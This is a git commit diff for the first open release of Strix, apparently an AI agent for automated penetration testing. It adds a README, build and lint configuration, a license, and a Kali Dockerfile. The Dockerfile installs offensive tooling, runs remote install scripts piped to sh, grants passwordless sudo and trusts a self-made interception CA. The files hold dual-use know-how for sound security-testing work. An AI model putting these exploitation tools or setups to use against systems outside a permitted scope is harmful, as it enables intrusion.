Open-source release for Alpha version

This commit is contained in:
Ahmed Allam
2025-08-08 20:36:44 -07:00
commit 81ac98e8b9
105 changed files with 22125 additions and 0 deletions


@@ -0,0 +1,126 @@
---
description:
globs:
alwaysApply: true
---
# Strix Cybersecurity Agent - Project Rules
## Project Overview
### Goal and Purpose
Strix is an AI-powered cybersecurity agent specialized in vulnerability scanning and security assessment. It provides:
- Automated cybersecurity scans and assessments
- Web application security testing
- Infrastructure vulnerability analysis
- Comprehensive security reporting
- RESTful API for scan management
- CLI interface for direct usage
The project implements an AI-powered ReAct (Reasoning and Acting) framework for autonomous security testing.
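As a rough illustration of the ReAct idea (the function and tool names below are hypothetical, not the actual Strix API), the loop alternates model-driven reasoning with tool execution until the agent decides it is done:

```python
# Minimal ReAct-style loop sketch (hypothetical names, not the Strix API).
def react_loop(decide, tools, task, max_steps=10):
    """Alternate reasoning (decide) and acting (tool calls) until 'finish'."""
    history = [f"Task: {task}"]
    for _ in range(max_steps):
        action, arg = decide(history)          # model chooses the next action
        if action == "finish":
            return arg                         # final result
        observation = tools[action](arg)       # execute tool, observe result
        history.append(f"Observation: {observation}")
    return None

# Toy stand-ins for an LLM policy and a scanning tool.
def toy_decide(history):
    return ("finish", "done") if any("open" in h for h in history) else ("scan", "host")

result = react_loop(toy_decide, {"scan": lambda t: f"port 80 open on {t}"}, "scan host")
```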
## Project Structure
### High-Level Architecture
```
strix-agent/
├── strix/ # Core application package
│ ├── agents/ # AI agent implementations
│ ├── api/ # FastAPI web service
│ ├── cli/ # Command-line interface
│ ├── llm/ # Language model configurations
│ └── tools/ # Security testing tools
├── tests/ # Test suite
├── evaluation/ # Evaluation framework
├── containers/ # Docker configuration
└── docs/ # Documentation
```
### Low-Level Structure
#### Core Components
- **[strix/agents/StrixAgent/strix_agent.py](mdc:strix/agents/StrixAgent/strix_agent.py)** - Main cybersecurity agent
- **[strix/agents/base_agent.py](mdc:strix/agents/base_agent.py)** - Base agent framework
- **[strix/api/main.py](mdc:strix/api/main.py)** - FastAPI application entry point
- **[strix/cli/main.py](mdc:strix/cli/main.py)** - CLI entry point
- **[pyproject.toml](mdc:pyproject.toml)** - Project configuration and dependencies
#### API Structure
- **[strix/api/routers/](mdc:strix/api/routers)** - API endpoint definitions
- **[strix/api/models/](mdc:strix/api/models)** - Pydantic data models
- **[strix/api/services/](mdc:strix/api/services)** - Business logic services
#### Security Tools
- **[strix/tools/browser/](mdc:strix/tools/browser)** - Web browser automation
- **[strix/tools/terminal/](mdc:strix/tools/terminal)** - Terminal command execution
- **[strix/tools/python/](mdc:strix/tools/python)** - Python code execution
- **[strix/tools/web_search/](mdc:strix/tools/web_search)** - Web reconnaissance
- **[strix/tools/reporting/](mdc:strix/tools/reporting)** - Security report generation
## Development Guidelines
### Code Standards
- **Simplicity**: Write simple, clean, and modular code
- **Functionality**: Prefer functional programming patterns where appropriate
- **Efficiency**: Optimize for performance, but avoid premature optimization
- **No Bloat**: Avoid unnecessary complexity or over-engineering
- **Minimal Comments**: Code should be self-documenting; use comments sparingly for complex business logic only
### Code Quality Requirements
- All code MUST pass `make pre-commit` checks
- All code MUST pass Ruff linting without warnings
- All code MUST pass MyPy type checking without errors
- Type hints are required for all function signatures
- Follow the strict configuration in [pyproject.toml](mdc:pyproject.toml)
### Execution Environment
- **ALWAYS** use `poetry run` for executing Python scripts and commands
- **NEVER** run Python directly with `python` command
- Use `poetry run strix-agent` for CLI operations
- Use `poetry run uvicorn strix.api.main:app` for API server
### File Management Rules
- **DO NOT** create or edit README.md or any .md documentation files unless explicitly requested
- Focus on code implementation, not documentation
- Keep docstrings concise and functional
### Testing and Quality Assurance
- Run `make pre-commit` before any commits
- Ensure all tests pass with `poetry run pytest`
- Use `poetry run mypy .` for type checking
- Use `poetry run ruff check .` for linting
### Dependencies
- All dependencies managed through [pyproject.toml](mdc:pyproject.toml)
- Use Poetry for dependency management
- Pin versions for production dependencies
- Keep dev dependencies in separate group
### Configuration
- Application settings in [strix/api/core/config.py](mdc:strix/api/core/config.py)
- LLM configuration in [strix/llm/config.py](mdc:strix/llm/config.py)
- Agent system prompts in [strix/agents/StrixAgent/system_prompt.jinja](mdc:strix/agents/StrixAgent/system_prompt.jinja)
## Key Implementation Patterns
### Agent Framework
- Inherit from BaseAgent for new agent implementations
- Use ReAct pattern for reasoning and action loops
- Implement tools through the registry system in [strix/tools/registry.py](mdc:strix/tools/registry.py)
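A hedged sketch of the registry pattern (the decorator name and dict layout are assumptions; the real `strix/tools/registry.py` API may differ):

```python
# Sketch of a decorator-based tool registry (hypothetical, for illustration).
from typing import Callable

TOOL_REGISTRY: dict[str, Callable] = {}

def register_tool(name: str):
    def decorator(fn: Callable) -> Callable:
        TOOL_REGISTRY[name] = fn               # make the tool discoverable by name
        return fn
    return decorator

@register_tool("port_check")
def port_check(host: str) -> str:
    return f"checked {host}"

result = TOOL_REGISTRY["port_check"]("example.test")
```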
### API Development
- Use FastAPI with Pydantic models
- Implement proper error handling and validation
- Follow REST conventions for endpoints
- Use Beanie ODM for MongoDB operations
### Security Tools
- Implement tools as action classes with clear interfaces
- Use async/await for I/O operations
- Implement proper cleanup and resource management
- Follow principle of least privilege
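One way to sketch the async action-class-with-cleanup pattern (the class and method names are illustrative, not the real Strix tool classes):

```python
# Hypothetical async tool action with guaranteed resource cleanup.
import asyncio

class TerminalAction:
    async def __aenter__(self):
        self.session = []                      # stand-in for a real shell session
        return self

    async def run(self, cmd: str) -> str:
        await asyncio.sleep(0)                 # yield control, as real I/O would
        self.session.append(cmd)
        return f"ran: {cmd}"

    async def __aexit__(self, *exc):
        self.session.clear()                   # cleanup runs even on errors

async def demo():
    async with TerminalAction() as term:
        return await term.run("whoami")

result = asyncio.run(demo())
```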
### Error Handling
- Use structured exception handling
- Provide meaningful error messages
- Log errors appropriately without exposing sensitive information
- Implement graceful degradation where possible
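The error-handling rules above could look roughly like this in practice (the exception class and wrapper are illustrative assumptions):

```python
# Sketch of structured error handling that logs without leaking sensitive data.
import logging

logger = logging.getLogger("strix")

class ToolError(Exception):
    """Raised when a security tool fails in a recoverable way."""

def safe_run(tool, *args):
    try:
        return tool(*args)
    except ToolError as exc:
        logger.warning("tool failed: %s", exc)   # log the message only, no payloads
        return None                              # graceful degradation

def flaky(_):
    raise ToolError("timeout")

result = safe_run(flaky, "target")
```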

.github/screenshot.png (binary, new file, 679 KiB)

.gitignore (new file, 98 lines)

@@ -0,0 +1,98 @@
# Python
__pycache__/
*.py[cod]
*$py.class
*.so
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg
# Virtual Environment
venv/
env/
ENV/
.env
.venv
pip-log.txt
pip-delete-this-directory.txt
# IDE
.idea/
.vscode/
*.swp
*.swo
.DS_Store
.project
.pydevproject
.settings/
# Testing
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/
.pytest_cache/
htmlcov/
# FastAPI
.env.local
.env.development.local
.env.test.local
.env.production.local
# MongoDB
data/
mongod.log
*.mongodb
*.mongorc.js
# LLM and ML related
*.bin
*.pt
*.pth
*.onnx
*.h5
*.hdf5
*.pkl
*.joblib
wandb/
runs/
checkpoints/
logs/
tensorboard/
# Agent execution traces
agent_runs/
# Misc
*.log
*.sqlite
*.db
.directory
*.bak
*.tmp
*.temp
Thumbs.db
*.schema.graphql
schema.graphql
.opencode/

.pre-commit-config.yaml (new file, 62 lines)

@@ -0,0 +1,62 @@
repos:
  # Ruff for fast linting and formatting
  - repo: https://github.com/astral-sh/ruff-pre-commit
    rev: v0.11.13
    hooks:
      - id: ruff
        args: [--fix, --exit-non-zero-on-fix]
        name: ruff-lint
      - id: ruff-format
        name: ruff-format
  # MyPy for static type checking
  - repo: https://github.com/pre-commit/mirrors-mypy
    rev: v1.16.0
    hooks:
      - id: mypy
        additional_dependencies: [
          types-requests,
          types-python-dateutil,
          pydantic,
          fastapi,
        ]
        args: [--install-types, --non-interactive]
  # Built-in hooks for basic file checks
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v5.0.0
    hooks:
      - id: trailing-whitespace
      - id: end-of-file-fixer
      - id: check-toml
      - id: check-merge-conflict
      - id: check-added-large-files
      - id: debug-statements
      - id: check-case-conflict
      - id: check-docstring-first
  # Security checks with bandit
  - repo: https://github.com/PyCQA/bandit
    rev: 1.8.3
    hooks:
      - id: bandit
        args: [-c, pyproject.toml]
  # Additional Python code quality checks
  - repo: https://github.com/asottile/pyupgrade
    rev: v3.20.0
    hooks:
      - id: pyupgrade
        args: [--py312-plus]

ci:
  autofix_commit_msg: |
    [pre-commit.ci] auto fixes from pre-commit.com hooks

    for more information, see https://pre-commit.ci
  autofix_prs: true
  autoupdate_branch: ""
  autoupdate_commit_msg: "[pre-commit.ci] pre-commit autoupdate"
  autoupdate_schedule: weekly
  skip: []
  submodules: false

LICENSE (new file, 201 lines)

@@ -0,0 +1,201 @@
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright 2025 OmniSecure Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

Makefile (new file, 90 lines)

@@ -0,0 +1,90 @@
.PHONY: help install dev-install format lint type-check test test-cov clean pre-commit setup-dev

help:
	@echo "Available commands:"
	@echo "  setup-dev   - Install all development dependencies and setup pre-commit"
	@echo "  install     - Install production dependencies"
	@echo "  dev-install - Install development dependencies"
	@echo ""
	@echo "Code Quality:"
	@echo "  format      - Format code with ruff"
	@echo "  lint        - Lint code with ruff and pylint"
	@echo "  type-check  - Run type checking with mypy and pyright"
	@echo "  security    - Run security checks with bandit"
	@echo "  check-all   - Run all code quality checks"
	@echo ""
	@echo "Testing:"
	@echo "  test        - Run tests with pytest"
	@echo "  test-cov    - Run tests with coverage reporting"
	@echo ""
	@echo "Development:"
	@echo "  pre-commit  - Run pre-commit hooks on all files"
	@echo "  clean       - Clean up cache files and artifacts"

install:
	poetry install --only=main

dev-install:
	poetry install --with=dev

setup-dev: dev-install
	poetry run pre-commit install
	@echo "✅ Development environment setup complete!"
	@echo "Run 'make check-all' to verify everything works correctly."

format:
	@echo "🎨 Formatting code with ruff..."
	poetry run ruff format .
	@echo "✅ Code formatting complete!"

lint:
	@echo "🔍 Linting code with ruff..."
	poetry run ruff check . --fix
	@echo "📝 Running additional linting with pylint..."
	poetry run pylint strix/ --score=no --reports=no
	@echo "✅ Linting complete!"

type-check:
	@echo "🔍 Type checking with mypy..."
	poetry run mypy strix/
	@echo "🔍 Type checking with pyright..."
	poetry run pyright strix/
	@echo "✅ Type checking complete!"

security:
	@echo "🔒 Running security checks with bandit..."
	poetry run bandit -r strix/ -c pyproject.toml
	@echo "✅ Security checks complete!"

check-all: format lint type-check security
	@echo "✅ All code quality checks passed!"

test:
	@echo "🧪 Running tests..."
	poetry run pytest -v
	@echo "✅ Tests complete!"

test-cov:
	@echo "🧪 Running tests with coverage..."
	poetry run pytest -v --cov=strix --cov-report=term-missing --cov-report=html
	@echo "✅ Tests with coverage complete!"
	@echo "📊 Coverage report generated in htmlcov/"

pre-commit:
	@echo "🔧 Running pre-commit hooks..."
	poetry run pre-commit run --all-files
	@echo "✅ Pre-commit hooks complete!"

clean:
	@echo "🧹 Cleaning up cache files..."
	find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true
	find . -type d -name ".pytest_cache" -exec rm -rf {} + 2>/dev/null || true
	find . -type d -name ".mypy_cache" -exec rm -rf {} + 2>/dev/null || true
	find . -type d -name ".ruff_cache" -exec rm -rf {} + 2>/dev/null || true
	find . -type d -name "htmlcov" -exec rm -rf {} + 2>/dev/null || true
	find . -name "*.pyc" -delete 2>/dev/null || true
	find . -name ".coverage" -delete 2>/dev/null || true
	@echo "✅ Cleanup complete!"

dev: format lint type-check test
	@echo "✅ Development cycle complete!"

README.md (new file, 157 lines)

@@ -0,0 +1,157 @@
<div align="center">
# Strix
### Open-source AI hackers for your apps
[![Apache 2.0](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](LICENSE)
[![Vercel AI Accelerator 2025](https://img.shields.io/badge/Vercel%20AI-Accelerator%202025-000000?style=flat&logo=vercel)](https://vercel.com/ai-accelerator)
[![Status: Alpha](https://img.shields.io/badge/status-alpha-orange.svg)](https://github.com/usestrix/strix)
[![Discord](https://dcbadge.limes.pink/api/server/yduEyduBsp?style=flat)](https://discord.gg/yduEyduBsp)
**⚡ Use it to hack your apps before the bad guys do ⚡**
</div>
<div align="center">
<img src=".github/screenshot.png" alt="Strix Demo" width="800" style="border-radius: 16px; box-shadow: 0 20px 40px rgba(0, 0, 0, 0.3), 0 0 0 1px rgba(255, 255, 255, 0.1), inset 0 1px 0 rgba(255, 255, 255, 0.2); transform: perspective(1000px) rotateX(2deg); transition: transform 0.3s ease;">
</div>
---
## 🚨 The AI Security Crisis
Everyone's shipping code faster than ever. Cursor, Windsurf, and Claude made coding easy - but QA and security testing are now the real bottlenecks.
> **The number of security vulnerabilities has doubled in the post-AI era.**
Traditional security tools weren't designed for this. SAST was a temporary fix when manual pentesting cost $10k+ and took weeks. Now, Strix delivers real security testing rapidly.
**The solution:** Enable developers to use AI coding at full speed, without compromising on security.
## 🦉 Strix Overview
Strix is a team of autonomous AI agents that act just like real hackers: they run your code dynamically, find vulnerabilities, and validate them through actual exploitation. It is built for developers and security teams who need fast, accurate security testing without the overhead of manual pentesting or the false positives of static analysis tools.
### 🚀 Quick Start
```bash
# Install
pipx install strix-agent
# Configure AI provider
export STRIX_LLM="anthropic/claude-sonnet-4-20250514"
export LLM_API_KEY="your-api-key"
# Run security assessment
strix --target ./app-directory
```
## Why Use Strix
- **Full Hacker Arsenal** - All the tools a professional hacker needs, built into the agents
- **Real Validation** - Dynamic testing and actual exploitation, resulting in far fewer false positives
- **Developer-First** - Seamlessly integrates into existing development workflows
- **Auto-Fix & Reporting** - Automated patching with detailed remediation and security reports
## ✨ Features
### 🛠️ Agentic Security Tools
- **🔌 Full HTTP Proxy** - Full request/response manipulation and analysis
- **🌐 Browser Automation** - Multi-tab browser for testing XSS, CSRF, and auth flows
- **💻 Terminal Environments** - Interactive shells for command execution and testing
- **🐍 Python Runtime** - Custom exploit development and validation
- **🔍 Reconnaissance** - Automated OSINT and attack surface mapping
- **📁 Code Analysis** - Static and dynamic analysis capabilities
- **📝 Knowledge Management** - Structured findings and attack documentation
### 🎯 Comprehensive Vulnerability Detection
- **Access Control** - IDOR, privilege escalation, auth bypass
- **Injection Attacks** - SQL, NoSQL, command injection
- **Server-Side** - SSRF, XXE, deserialization flaws
- **Client-Side** - XSS, prototype pollution, DOM vulnerabilities
- **Business Logic** - Race conditions, workflow manipulation
- **Authentication** - JWT vulnerabilities, session management
- **Infrastructure** - Misconfigurations, exposed services
### 🕸️ Graph of Agents
- **Distributed Workflows** - Specialized agents for different attacks and assets
- **Scalable Testing** - Parallel execution for fast comprehensive coverage
- **Dynamic Coordination** - Agents collaborate and share discoveries
## 💻 Usage Examples
```bash
# Local codebase analysis
strix --target ./app-directory
# Repository security review
strix --target https://github.com/org/repo
# Web application assessment
strix --target https://your-app.com
# Focused testing
strix --target api.your-app.com --instruction "Prioritize authentication and authorization testing"
```
### ⚙️ Configuration
```bash
# Required
export STRIX_LLM="anthropic/claude-sonnet-4-20250514"
export LLM_API_KEY="your-api-key"
# Recommended
export PERPLEXITY_API_KEY="your-api-key"
```
[📚 View supported AI models](https://docs.litellm.ai/docs/providers)
## 🏆 Enterprise Platform
Our managed platform provides:
- **📈 Executive Dashboards**
- **🧠 Custom Fine-Tuned Models**
- **⚙️ CI/CD Integration**
- **🔍 Large-Scale Scanning**
- **🔌 Third-Party Integrations**
- **🎯 Enterprise Support**
[**Get Enterprise Demo →**](https://form.typeform.com/to/ljtvl6X0)
## 🔒 Security Architecture
- **Container Isolation** - All testing in sandboxed Docker environments
- **Local Processing** - Testing runs locally, no data sent to external services
> [!NOTE]
> Strix is currently in Alpha. Expect rapid updates and improvements.
> [!WARNING]
> Only test systems you own or have permission to test. You are responsible for using Strix ethically and legally.
## 🌟 Support the Project
**Love Strix?** Give us a ⭐ on GitHub!
## 👥 Join Our Community
Have questions? Found a bug? Want to contribute? **[Join our Discord!](https://discord.gg/yduEyduBsp)**
---
<div align="center">
### About • Links
**[OmniSecure Inc.](https://omnisecure.ai)** • Applied AI Research Lab
[Discord Community](https://discord.gg/yduEyduBsp) • [Enterprise Solutions](https://form.typeform.com/to/ljtvl6X0) • [Report Issues](https://github.com/usestrix/strix/issues)
</div>

containers/Dockerfile (new file, 190 lines)

@@ -0,0 +1,190 @@
FROM kalilinux/kali-rolling:latest
LABEL description="AI Agent Penetration Testing Environment with Comprehensive Automated Tools"
RUN apt-get update && \
apt-get install -y kali-archive-keyring sudo && \
apt-get update && \
apt-get upgrade -y
RUN useradd -m -s /bin/bash pentester && \
usermod -aG sudo pentester && \
echo "pentester ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
RUN mkdir -p /home/pentester/configs \
/home/pentester/wordlists \
/home/pentester/output \
/home/pentester/scripts \
/home/pentester/tools \
/app/runtime \
/app/tools \
/app/certs && \
chown -R pentester:pentester /app/certs /home/pentester/tools
RUN apt-get update && \
apt-get install -y --no-install-recommends \
wget curl git vim nano unzip tar \
apt-transport-https ca-certificates gnupg lsb-release \
build-essential software-properties-common \
gcc libc6-dev pkg-config libpcap-dev libssl-dev \
python3 python3-pip python3-dev python3-venv python3-setuptools \
golang-go \
net-tools dnsutils whois \
jq parallel ripgrep grep \
less man-db procps htop \
iproute2 iputils-ping netcat-traditional \
nmap ncat ndiff \
sqlmap nuclei subfinder naabu ffuf \
nodejs npm pipx \
libcap2-bin \
gdb \
libnss3 libnspr4 libdbus-1-3 libatk1.0-0 libatk-bridge2.0-0 libcups2 libdrm2 libatspi2.0-0 \
libxcomposite1 libxdamage1 libxfixes3 libxrandr2 libgbm1 libxkbcommon0 libpango-1.0-0 libcairo2 libasound2 \
fonts-unifont fonts-noto-color-emoji fonts-freefont-ttf fonts-dejavu-core ttf-bitstream-vera \
libnss3-tools
RUN setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip $(which nmap)
USER pentester
RUN openssl ecparam -name prime256v1 -genkey -noout -out /app/certs/ca.key && \
openssl req -x509 -new -key /app/certs/ca.key \
-out /app/certs/ca.crt \
-days 3650 \
-subj "/C=US/ST=CA/O=Security Testing/CN=Testing Root CA" \
-addext "basicConstraints=critical,CA:TRUE" \
-addext "keyUsage=critical,digitalSignature,keyEncipherment,keyCertSign" && \
openssl pkcs12 -export \
-out /app/certs/ca.p12 \
-inkey /app/certs/ca.key \
-in /app/certs/ca.crt \
-passout pass:"" \
-name "Testing Root CA" && \
chmod 644 /app/certs/ca.crt && \
chmod 600 /app/certs/ca.key && \
chmod 600 /app/certs/ca.p12
USER root
RUN cp /app/certs/ca.crt /usr/local/share/ca-certificates/ca.crt && \
update-ca-certificates
RUN curl -sSL https://install.python-poetry.org | POETRY_HOME=/opt/poetry python3 - && \
ln -s /opt/poetry/bin/poetry /usr/local/bin/poetry && \
chmod +x /usr/local/bin/poetry && \
python3 -m venv /app/venv && \
chown -R pentester:pentester /app/venv /opt/poetry
USER pentester
WORKDIR /tmp
RUN go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && \
go install -v github.com/projectdiscovery/katana/cmd/katana@latest && \
go install -v github.com/projectdiscovery/cvemap/cmd/vulnx@latest && \
go install -v github.com/jaeles-project/gospider@latest && \
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
RUN nuclei -update-templates
RUN pipx install arjun && \
pipx install dirsearch && \
pipx inject dirsearch setuptools && \
pipx install wafw00f
ENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global
RUN mkdir -p /home/pentester/.npm-global
RUN npm install -g retire@latest && \
npm install -g eslint@latest && \
npm install -g js-beautify@latest
WORKDIR /home/pentester/tools
RUN git clone https://github.com/aravind0x7/JS-Snooper.git && \
chmod +x JS-Snooper/js_snooper.sh && \
git clone https://github.com/xchopath/jsniper.sh.git && \
chmod +x jsniper.sh/jsniper.sh && \
git clone https://github.com/ticarpi/jwt_tool.git && \
chmod +x jwt_tool/jwt_tool.py
USER root
RUN curl -sSfL https://raw.githubusercontent.com/trufflesecurity/trufflehog/main/scripts/install.sh | sh -s -- -b /usr/local/bin
RUN apt-get update && apt-get install -y zaproxy
RUN curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
RUN apt-get install -y wapiti
USER pentester
RUN pipx install semgrep && \
pipx install bandit
RUN npm install -g jshint
USER root
RUN apt-get autoremove -y && \
apt-get autoclean && \
rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
ENV PATH="/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:/app/venv/bin:$PATH"
ENV VIRTUAL_ENV="/app/venv"
ENV POETRY_HOME="/opt/poetry"
WORKDIR /app
RUN ARCH=$(uname -m) && \
if [ "$ARCH" = "x86_64" ]; then \
CAIDO_ARCH="x86_64"; \
elif [ "$ARCH" = "aarch64" ] || [ "$ARCH" = "arm64" ]; then \
CAIDO_ARCH="aarch64"; \
else \
echo "Unsupported architecture: $ARCH" && exit 1; \
fi && \
wget -O caido-cli.tar.gz https://caido.download/releases/v0.48.0/caido-cli-v0.48.0-linux-${CAIDO_ARCH}.tar.gz && \
tar -xzf caido-cli.tar.gz && \
chmod +x caido-cli && \
rm caido-cli.tar.gz && \
mv caido-cli /usr/local/bin/
ENV STRIX_SANDBOX_MODE=true
ENV PYTHONPATH=/app
ENV REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt
ENV SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt
RUN mkdir -p /shared_workspace /workspace && chown -R pentester:pentester /shared_workspace /workspace /app
COPY pyproject.toml poetry.lock ./
USER pentester
RUN poetry install --no-root --without dev
RUN poetry run playwright install chromium
RUN /app/venv/bin/pip install -r /home/pentester/tools/jwt_tool/requirements.txt && \
ln -s /home/pentester/tools/jwt_tool/jwt_tool.py /home/pentester/.local/bin/jwt_tool
RUN echo "# Sandbox Environment" > README.md
COPY strix/__init__.py strix/
COPY strix/runtime/tool_server.py strix/runtime/__init__.py strix/runtime/runtime.py /app/strix/runtime/
COPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py /app/strix/tools/
COPY strix/tools/browser/ /app/strix/tools/browser/
COPY strix/tools/file_edit/ /app/strix/tools/file_edit/
COPY strix/tools/notes/ /app/strix/tools/notes/
COPY strix/tools/python/ /app/strix/tools/python/
COPY strix/tools/terminal/ /app/strix/tools/terminal/
COPY strix/tools/proxy/ /app/strix/tools/proxy/
RUN echo 'export PATH="/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:$PATH"' >> /home/pentester/.bashrc && \
echo 'export PATH="/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:$PATH"' >> /home/pentester/.profile
USER root
COPY containers/docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh
RUN chmod +x /usr/local/bin/docker-entrypoint.sh
USER pentester
WORKDIR /workspace
